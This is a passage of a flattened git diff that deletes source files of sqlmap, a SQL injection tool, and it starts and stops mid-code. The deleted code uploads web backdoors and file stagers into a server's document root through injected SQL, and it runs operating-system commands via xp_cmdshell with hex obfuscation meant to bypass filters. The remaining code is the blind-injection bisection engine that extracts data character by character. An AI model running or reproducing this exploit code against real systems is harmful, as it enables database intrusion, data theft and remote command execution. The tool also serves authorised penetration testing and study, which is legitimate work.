    ", page, re.I | re.S) - - if output: - output = output.group(1) - - return output - - def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None): - if filepath is not None: - if filepath.endswith('_'): - content = decloak(filepath) # cloaked file - else: - with open(filepath, "rb") as f: - content = f.read() - - if content is not None: - stream = StringIO.StringIO(content) # string content - - return self._webFileStreamUpload(stream, destFileName, directory) - - def _webFileStreamUpload(self, stream, destFileName, directory): - stream.seek(0) # Rewind - - try: - setattr(stream, "name", destFileName) - except TypeError: - pass - - if self.webApi in getPublicTypeMembers(WEB_API, True): - multipartParams = { - "upload": "1", - "file": stream, - "uploadDir": directory, - } - - if self.webApi == WEB_API.ASPX: - multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION - multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE - - page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) - - if "File uploaded" not in page: - warnMsg = "unable to upload the file through the web file " - warnMsg += "stager to '%s'" % directory - logger.warn(warnMsg) - return False - else: - return True - else: - logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi) - return False - - def _webFileInject(self, fileContent, fileName, directory): - outFile = posixpath.join(ntToPosixSlashes(directory), fileName) - uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) - query = "" - - if isTechniqueAvailable(kb.technique): - where = kb.injection.data[kb.technique].where - - if where == PAYLOAD.WHERE.NEGATIVE: - randInt = randomInt() - query += "OR %d=%d " % (randInt, randInt) - - query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery)) - query = agent.prefixQuery(query) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - page = Request.queryPage(payload) - - return page - - def webInit(self): - """ - This method is used to write a web backdoor (agent) on a writable - remote directory within the web server document root. - """ - - if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: - return - - self.checkDbmsOs() - - default = None - choices = list(getPublicTypeMembers(WEB_API, True)) - - for ext in choices: - if conf.url.endswith(ext): - default = ext - break - - if not default: - default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP - - message = "which web application language does the web server " - message += "support?\n" - - for count in xrange(len(choices)): - ext = choices[count] - message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) - - if default == ext: - default = count + 1 - - message = message[:-1] - - while True: - choice = readInput(message, default=str(default)) - - if not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - - elif int(choice) < 1 or int(choice) > len(choices): - logger.warn("invalid value, it must be between 1 and %d" % len(choices)) - - else: - self.webApi = choices[int(choice) - 1] - break - - directories = list(arrayizeValue(getManualDirectories())) - directories.extend(getAutoDirectories()) - directories = list(oset(directories)) - - backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) - backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) - - stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - - for directory in directories: - if not directory: - continue - - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) - self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - - uploaded = False - directory = ntToPosixSlashes(normalizePath(directory)) - - if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): - directory = "/%s" % directory - else: - directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory - - if not directory.endswith('/'): - directory += '/' - - # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method - infoMsg = "trying to upload the file stager on '%s' " % directory - infoMsg += "via LIMIT 'LINES TERMINATED BY' method" - logger.info(infoMsg) - self._webFileInject(stagerContent, stagerName, directory) - - for match in re.finditer('/', directory): - self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) - self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) - debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl - logger.debug(debugMsg) - - uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) - uplPage = uplPage or "" - - if "sqlmap file uploader" in uplPage: - uploaded = True - break - - # Fall-back to UNION queries file upload method - if not uploaded: - warnMsg = "unable to upload the file stager " - warnMsg += "on '%s'" % directory - singleTimeWarnMessage(warnMsg) - - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - infoMsg = "trying to upload the file stager on '%s' " % directory - infoMsg += "via UNION method" - logger.info(infoMsg) - - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) - self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - - handle, filename = tempfile.mkstemp() - os.close(handle) - - with open(filename, "w+b") as f: - _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) - f.write(_) - - self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) - - for match in re.finditer('/', directory): - self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) - self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) - - debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl - logger.debug(debugMsg) - - uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) - uplPage = uplPage or "" - - if "sqlmap file uploader" in uplPage: - uploaded = True - break - - if not uploaded: - continue - - if "<%" in uplPage or "> \"%s\%s\"" % (tmpPath, randDestFile) - echoedLines.append(echoedLine) - - for echoedLine in echoedLines: - cmd += "%s & " % echoedLine - charCounter += len(echoedLine) - - if charCounter >= maxLen: - self.xpCmdshellExecCmd(cmd.rstrip(" & ")) - - cmd = "" - charCounter = 0 - - if cmd: - self.xpCmdshellExecCmd(cmd.rstrip(" & ")) - - def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): - # When user provides DBMS credentials (with --dbms-cred) we need to - # redirect the command standard output to a temporary file in order - # to retrieve it afterwards - # NOTE: this does not need to be done when the command is 'del' to - # delete the temporary file - if conf.dbmsCred and insertIntoTable: - self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) - cmd = "%s > \"%s\"" % (cmd, self.tmpFile) - - # Obfuscate the command to execute, also useful to bypass filters - # on single-quotes - self._randStr = randomStr(lowercase=True) - self._cmd = "0x%s" % hexencode(cmd) - self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr - self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd) - - # Insert the command standard output into a support table, - # 'sqlmapoutput', except when DBMS credentials are provided because - # it does not work unfortunately, BULK INSERT needs to be used to - # retrieve the output when OPENROWSET is used hence the redirection - # to a temporary file from above - if insertIntoTable and not conf.dbmsCred: - self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable - - self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) - - return agent.runAsDBMSUser(self._forgedCmd) - - def xpCmdshellExecCmd(self, cmd, silent=False): - return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) - - def xpCmdshellEvalCmd(self, cmd, first=None, last=None): - output = None - - if conf.direct: - output = self.xpCmdshellExecCmd(cmd) - - if output and isinstance(output, (list, tuple)): - new_output = "" - - for line in output: - if line == "NULL": - new_output += "\n" - else: - new_output += "%s\n" % line.strip("\r") - - output = new_output - else: - inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName)) - - # When user provides DBMS credentials (with --dbms-cred), the - # command standard output is redirected to a temporary file - # The file needs to be copied to the support table, - # 'sqlmapoutput' - if conf.dbmsCred: - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) - self.delRemoteFile(self.tmpFile) - - query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - output = inject.getValue(query, resumeValue=False, blind=False, time=False) - - if (output is None) or len(output)==0 or output[0] is None: - output = [] - count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(count): - for index in getLimitRange(count): - query = agent.limitQuery(index, query, self.tblField) - output.append(inject.getValue(query, union=False, error=False, resumeValue=False)) - - inject.goStacked("DELETE FROM %s" % self.cmdTblName) - - if output and isListLike(output) and len(output) > 1: - _ = "" - lines = [line for line in flattenValue(output) if line is not None] - - for i in xrange(len(lines)): - line = lines[i] or "" - if line is None or i in (0, len(lines) - 1) and not line.strip(): - continue - _ += "%s\n" % line - - output = _.rstrip('\n') - - return output - - def xpCmdshellInit(self): - if not kb.xpCmdshellAvailable: - infoMsg = "checking if xp_cmdshell extended procedure is " - infoMsg += "available, please wait.." - logger.info(infoMsg) - - result = self._xpCmdshellCheck() - - if result: - logger.info("xp_cmdshell extended procedure is available") - kb.xpCmdshellAvailable = True - - else: - message = "xp_cmdshell extended procedure does not seem to " - message += "be available. Do you want sqlmap to try to " - message += "re-enable it? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice in ("y", "Y"): - self._xpCmdshellConfigure(1) - - if self._xpCmdshellCheck(): - logger.info("xp_cmdshell re-enabled successfully") - kb.xpCmdshellAvailable = True - - else: - logger.warn("xp_cmdshell re-enabling failed") - - logger.info("creating xp_cmdshell with sp_OACreate") - self._xpCmdshellConfigure(0) - self._xpCmdshellCreate() - - if self._xpCmdshellCheck(): - logger.info("xp_cmdshell created successfully") - kb.xpCmdshellAvailable = True - - else: - warnMsg = "xp_cmdshell creation failed, probably " - warnMsg += "because sp_OACreate is disabled" - logger.warn(warnMsg) - - hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable) - - if not kb.xpCmdshellAvailable: - errMsg = "unable to proceed without xp_cmdshell" - raise SqlmapUnsupportedFeatureException(errMsg) - - debugMsg = "creating a support table to write commands standard " - debugMsg += "output to" - logger.debug(debugMsg) - - # TEXT can't be used here because in error technique you get: - # "The text, ntext, and image data types cannot be compared or sorted" - self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)") - - self._xpCmdshellTest() diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/blind/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py deleted file mode 100644 index 41b54d7c..00000000 --- a/lib/techniques/blind/inference.py +++ /dev/null @@ -1,630 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import threading -import time - -from extra.safe2bin.safe2bin import safechardecode -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue -from lib.core.common import decodeIntToUnicode -from lib.core.common import filterControlChars -from lib.core.common import getCharset -from lib.core.common import getCounter -from lib.core.common import getUnicode -from lib.core.common import goGoodSamaritan -from lib.core.common import getPartRun -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import incrementCounter -from lib.core.common import randomInt -from lib.core.common import safeStringFormat -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import ADJUST_TIME_DELAY -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapThreadException -from lib.core.settings import CHAR_INFERENCE_MARK -from lib.core.settings import INFERENCE_BLANK_BREAK -from lib.core.settings import INFERENCE_UNKNOWN_CHAR -from lib.core.settings import INFERENCE_GREATER_CHAR -from lib.core.settings import INFERENCE_EQUALS_CHAR -from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR -from lib.core.settings import MIN_TIME_RESPONSES -from lib.core.settings import MAX_BISECTION_LENGTH -from lib.core.settings import MAX_TIME_REVALIDATION_STEPS -from lib.core.settings import NULL -from lib.core.settings import PARTIAL_HEX_VALUE_MARKER -from lib.core.settings import PARTIAL_VALUE_MARKER -from lib.core.settings import RANDOM_INTEGER_MARKER -from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request -from lib.utils.progress import ProgressBar -from lib.utils.xrange import xrange - -def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): - """ - Bisection algorithm that can be used to perform blind SQL injection - on an affected host - """ - - abortedFlag = False - showEta = False - partialValue = u"" - finalValue = None - retrievedLength = 0 - asciiTbl = getCharset(charsetType) - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) - retVal = hashDBRetrieve(expression, checkConf=True) - - if retVal: - if PARTIAL_HEX_VALUE_MARKER in retVal: - retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") - - if retVal and conf.hexConvert: - partialValue = retVal - infoMsg = "resuming partial value: %s" % safecharencode(partialValue) - logger.info(infoMsg) - elif PARTIAL_VALUE_MARKER in retVal: - retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") - - if retVal and not conf.hexConvert: - partialValue = retVal - infoMsg = "resuming partial value: %s" % safecharencode(partialValue) - logger.info(infoMsg) - else: - infoMsg = "resumed: %s" % safecharencode(retVal) - logger.info(infoMsg) - - return 0, retVal - - try: - # Set kb.partRun in case "common prediction" feature (a.k.a. "good - # samaritan") is used or the engine is called from the API - if conf.predictOutput: - kb.partRun = getPartRun() - elif hasattr(conf, "api"): - kb.partRun = getPartRun(alias=False) - else: - kb.partRun = None - - if partialValue: - firstChar = len(partialValue) - elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): - firstChar = 0 - elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): - firstChar = int(conf.firstChar) - 1 - elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int): - firstChar = int(firstChar) - 1 - else: - firstChar = 0 - - if "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): - lastChar = 0 - elif dump and conf.lastChar is not None and (isinstance(conf.lastChar, int) or (isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit())): - lastChar = int(conf.lastChar) - elif isinstance(lastChar, basestring) and lastChar.isdigit() or isinstance(lastChar, int): - lastChar = int(lastChar) - else: - lastChar = 0 - - if Backend.getDbms(): - _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) - nulledCastedField = agent.nullAndCastField(fieldToCastStr) - expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - expressionUnescaped = unescaper.escape(expressionReplaced) - else: - expressionUnescaped = unescaper.escape(expression) - - if isinstance(length, basestring) and length.isdigit() or isinstance(length, int): - length = int(length) - else: - length = None - - if length == 0: - return 0, "" - - if length and (lastChar > 0 or firstChar > 0): - length = min(length, lastChar or length) - firstChar - - if length and length > MAX_BISECTION_LENGTH: - length = None - - showEta = conf.eta and isinstance(length, int) - numThreads = min(conf.threads, length) - - if showEta: - progress = ProgressBar(maxValue=length) - - if timeBasedCompare and conf.threads > 1 and not conf.forceThreads: - warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" - singleTimeWarnMessage(warnMsg) - - if numThreads > 1: - if not timeBasedCompare or conf.forceThreads: - debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) - logger.debug(debugMsg) - else: - numThreads = 1 - - if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput: - warnMsg = "running in a single-thread mode. Please consider " - warnMsg += "usage of option '--threads' for faster data retrieval" - singleTimeWarnMessage(warnMsg) - - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): - if isinstance(length, int) and conf.threads > 1: - dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) - dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) - else: - dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) - - hintlock = threading.Lock() - - def tryHint(idx): - with hintlock: - hintValue = kb.hintValue - - if hintValue is not None and len(hintValue) >= idx: - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): - posValue = hintValue[idx - 1] - else: - posValue = ord(hintValue[idx - 1]) - - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - return hintValue[idx - 1] - - with hintlock: - kb.hintValue = None - - return None - - def validateChar(idx, value): - """ - Used in time-based inference (in case that original and retrieved - value are not equal there will be a deliberate delay). - """ - - if "'%s'" % CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) - else: - # e.g.: ... > '%c' -> ... > ORD(..) - markingValue = "'%s'" % CHAR_INFERENCE_MARK - unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) - - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - return not result - - def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): - """ - continuousOrder means that distance between each two neighbour's - numerical values is exactly 1 - """ - - result = tryHint(idx) - - if result: - return result - - if charTbl is None: - charTbl = type(asciiTbl)(asciiTbl) - - originalTbl = type(charTbl)(charTbl) - - if continuousOrder and shiftTable is None: - # Used for gradual expanding into unicode charspace - shiftTable = [2, 2, 3, 3, 5, 4] - - if "'%s'" % CHAR_INFERENCE_MARK in payload: - for char in ('\n', '\r'): - if ord(char) in charTbl: - charTbl.remove(ord(char)) - - if not charTbl: - return None - - elif len(charTbl) == 1: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - return decodeIntToUnicode(charTbl[0]) - else: - return None - - maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] - - while len(charTbl) != 1: - position = (len(charTbl) >> 1) - posValue = charTbl[position] - falsePayload = None - - if "'%s'" % CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) - falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) - else: - # e.g.: ... > '%c' -> ... > ORD(..) - markingValue = "'%s'" % CHAR_INFERENCE_MARK - unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) - falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) - - if timeBasedCompare: - if kb.responseTimeMode: - kb.responseTimePayload = falsePayload - else: - kb.responseTimePayload = None - - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - minValue = posValue - - if type(charTbl) != xrange: - charTbl = charTbl[position:] - else: - # xrange() - extended virtual charset used for memory/space optimization - charTbl = xrange(charTbl[position], charTbl[-1] + 1) - else: - maxValue = posValue - - if type(charTbl) != xrange: - charTbl = charTbl[:position] - else: - charTbl = xrange(charTbl[0], charTbl[position]) - - if len(charTbl) == 1: - if continuousOrder: - if maxValue == 1: - return None - - # Going beyond the original charset - elif minValue == maxChar: - # If the original charTbl was [0,..,127] new one - # will be [128,..,(128 << 4) - 1] or from 128 to 2047 - # and instead of making a HUGE list with all the - # elements we use a xrange, which is a virtual - # list - if expand and shiftTable: - charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) - originalTbl = xrange(charTbl) - maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] - else: - return None - else: - retVal = minValue + 1 - - if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): - if timeBasedCompare and not validateChar(idx, retVal): - if not kb.originalTimeDelay: - kb.originalTimeDelay = conf.timeSec - - kb.timeValidCharsRun = 0 - if retried < MAX_TIME_REVALIDATION_STEPS: - errMsg = "invalid character detected. retrying.." - logger.error(errMsg) - - if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: - conf.timeSec += 1 - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.warn(warnMsg) - - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - dbgMsg = "turning off time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - - return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) - else: - errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal) - logger.error(errMsg) - conf.timeSec = kb.originalTimeDelay - return decodeIntToUnicode(retVal) - else: - if timeBasedCompare: - kb.timeValidCharsRun += 1 - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: - dbgMsg = "turning back on time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES - - return decodeIntToUnicode(retVal) - else: - return None - else: - if minValue == maxChar or maxValue == minChar: - return None - - for index in xrange(len(originalTbl)): - if originalTbl[index] == minValue: - break - - # If we are working with non-continuous elements, both minValue and character after - # are possible candidates - for retVal in (originalTbl[index], originalTbl[index + 1]): - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - return decodeIntToUnicode(retVal) - - return None - - # Go multi-threading (--threads > 1) - if conf.threads > 1 and isinstance(length, int) and length > 1: - threadData = getCurrentThreadData() - - threadData.shared.value = [None] * length - threadData.shared.index = [firstChar] # As list for python nested function scoping - threadData.shared.start = firstChar - - try: - def blindThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.index.acquire() - - if threadData.shared.index[0] - firstChar >= length: - kb.locks.index.release() - - return - - threadData.shared.index[0] += 1 - curidx = threadData.shared.index[0] - kb.locks.index.release() - - if kb.threadContinue: - charStart = time.time() - val = getChar(curidx) - if val is None: - val = INFERENCE_UNKNOWN_CHAR - else: - break - - with kb.locks.value: - threadData.shared.value[curidx - 1 - firstChar] = val - currentValue = list(threadData.shared.value) - - if kb.threadContinue: - if showEta: - progress.progress(time.time() - charStart, threadData.shared.index[0]) - elif conf.verbose >= 1: - startCharIndex = 0 - endCharIndex = 0 - - for i in xrange(length): - if currentValue[i] is not None: - endCharIndex = max(endCharIndex, i) - - output = '' - - if endCharIndex > conf.progressWidth: - startCharIndex = endCharIndex - conf.progressWidth - - count = threadData.shared.start - - for i in xrange(startCharIndex, endCharIndex + 1): - output += '_' if currentValue[i] is None else currentValue[i] - - for i in xrange(length): - count += 1 if currentValue[i] is not None else 0 - - if startCharIndex > 0: - output = '..' + output[2:] - - if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): - output = output[:-2] + '..' - - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): - _ = count - firstChar - output += '_' * (min(length, conf.progressWidth) - len(output)) - status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) - output += status if _ != length else " " * len(status) - - dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) - - runThreads(numThreads, blindThread, startThreadMsg=False) - - except KeyboardInterrupt: - abortedFlag = True - - finally: - value = [_ for _ in partialValue] - value.extend(_ for _ in threadData.shared.value) - - infoMsg = None - - # If we have got one single character not correctly fetched it - # can mean that the connection to the target URL was lost - if None in value: - partialValue = "".join(value[:value.index(None)]) - - if partialValue: - infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(partialValue)) - else: - finalValue = "".join(value) - infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) - - if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"): - dataToStdout(infoMsg) - - # No multi-threading (--threads = 1) - else: - index = firstChar - - while True: - index += 1 - charStart = time.time() - - # Common prediction feature (a.k.a. "good samaritan") - # NOTE: to be used only when multi-threading is not set for - # the moment - if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None: - val = None - commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl) - - # If there is one single output in common-outputs, check - # it via equal against the query output - if commonValue is not None: - # One-shot query containing equals commonValue - testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) - - query = kb.injection.data[kb.technique].vector - query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue))) - query = agent.suffixQuery(query) - - result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - # Did we have luck? - if result: - if showEta: - progress.progress(time.time() - charStart, len(commonValue)) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): - dataToStdout(filterControlChars(commonValue[index - 1:])) - - finalValue = commonValue - break - - # If there is a common pattern starting with partialValue, - # check it via equal against the substring-query output - if commonPattern is not None: - # Substring-query containing equals commonPattern - subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) - testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) - - query = kb.injection.data[kb.technique].vector - query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue))) - query = agent.suffixQuery(query) - - result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - # Did we have luck? - if result: - val = commonPattern[index - 1:] - index += len(val) - 1 - - # Otherwise if there is no commonValue (single match from - # txt/common-outputs.txt) and no commonPattern - # (common pattern) use the returned common charset only - # to retrieve the query output - if not val and commonCharset: - val = getChar(index, commonCharset, False) - - # If we had no luck with commonValue and common charset, - # use the returned other charset - if not val: - val = getChar(index, otherCharset, otherCharset == asciiTbl) - else: - val = getChar(index, asciiTbl) - - if val is None: - finalValue = partialValue - break - - if kb.data.processChar: - val = kb.data.processChar(val) - - partialValue += val - - if showEta: - progress.progress(time.time() - charStart, index) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): - dataToStdout(filterControlChars(val)) - - # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces - if len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace() and partialValue.strip(' ')[-1:] != '\n': - finalValue = partialValue[:-INFERENCE_BLANK_BREAK] - break - - if (lastChar > 0 and index >= lastChar): - finalValue = "" if length == 0 else partialValue - finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue - partialValue = None - break - - except KeyboardInterrupt: - abortedFlag = True - finally: - kb.prependFlag = False - kb.stickyLevel = None - retrievedLength = len(finalValue or "") - - if finalValue is not None: - finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue - hashDBWrite(expression, finalValue) - elif partialValue: - hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) - - if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"): - infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) - dataToStdout(infoMsg) - else: - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): - 